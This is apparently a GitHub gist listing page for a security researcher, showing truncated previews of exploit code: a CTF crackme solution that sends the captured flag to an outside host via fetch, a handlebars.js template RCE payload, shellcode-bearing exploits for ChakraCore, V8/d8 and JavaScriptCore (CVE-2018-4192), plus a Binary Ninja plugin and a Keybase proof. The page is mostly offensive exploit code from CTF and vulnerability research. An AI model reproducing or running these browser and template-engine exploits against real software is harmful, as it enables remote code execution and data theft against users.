Skip to content

Instantly share code, notes, and snippets.

Amy itszn

Block or report user

Report or block itszn

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@itszn
itszn / solve1.html
Last active Nov 8, 2019
Easiest Crackme Solution
View solve1.html
<iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe>
<script>
let i=0;
window.addEventListener("message", function(event) {
msg = event.data;
console.log("attacker got ",msg);
if (msg.id == 0) {
a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
} else if (msg.id == 1) {
fetch("http://itszn.com/?flag="+msg.output);
@itszn
itszn / 0day.handlebars
Created Sep 16, 2019
handlebars.js rce 0day
View 0day.handlebars
//First we want to create an array
{{#with "a" as |str|}}
{{#with split as |list|}}
//Store some function that returns a truthy value into the array
//We use arrays to hold functions because handlebars will call functions
{{this.pop}}
{{this.push this.toString}}
{{this.pop}}
@itszn
itszn / exploit.js
Last active Sep 18, 2019
Trendmicro CTF ChakraCore exploit
View exploit.js
let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5];
let conva = new ArrayBuffer(8)
let convi = new Uint32Array(conva);
let convf = new Float64Array(conva);
function i2f(i) {
convi[0] = i%0x100000000;
convi[1] = i/0x100000000;
return convf[0];
@itszn
itszn / jquery-latest.js
Created Jun 19, 2019
Twitter Tag Challenge
View jquery-latest.js
/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.4.1",k=function(e,
@itszn
itszn / exploit.js
Created Jul 11, 2018
Exploit for JavascriptCore CVE-2018-4192
View exploit.js
// Load Int library, thanks saelo!
load('util.js');
load('int64.js');
// Helpers to convert from float to in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);
@itszn
itszn / d8.js
Last active Sep 8, 2019
Plaid CTF 2018 d8 exploit
View d8.js
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */
/* ### Utils, thanks saelo ### */
//
// Tiny module that provides big (64bit) integers.
//
// Copyright (c) 2016 Samuel Groß
//
View gist:0eaac8657401d08f3b9d25ffc87875d7
301345b6e7e96c9d37137fbcab602685178e922c81e5da545c7958d9cd3315e9
@itszn
itszn / exploit.html
Last active Sep 8, 2019
34c3ctf V9 Exploit
View exploit.html
<script>
function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } }
var sc = [];
for (var i=0; i<0x480; i++) {
sc.push(0x90);
}
//sc.push(0xcc);
//sc.push(0xeb);
//sc.push(0xfe);
@itszn
itszn / subleq.py
Created Oct 16, 2017
Binary Ninja subleq plugin
View subleq.py
from binaryninja import (Architecture, RegisterInfo, InstructionInfo,
InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext,
BranchType,
LowLevelILOperation, LLIL_TEMP,
LowLevelILLabel,
FlagRole,
LowLevelILFlagCondition,
log_error,
CallingConvention,
interaction,
View keybase.md

Keybase proof

I hereby claim:

  • I am itszn on github.
  • I am itszn (https://keybase.io/itszn) on keybase.
  • I have a public key ASAk2FcK4Zc6VAbULYP0m6uMVMTTBV1Cjr5QEL-4YsLlzgo

To claim this, I am signing this object:

You can’t perform that action at this time.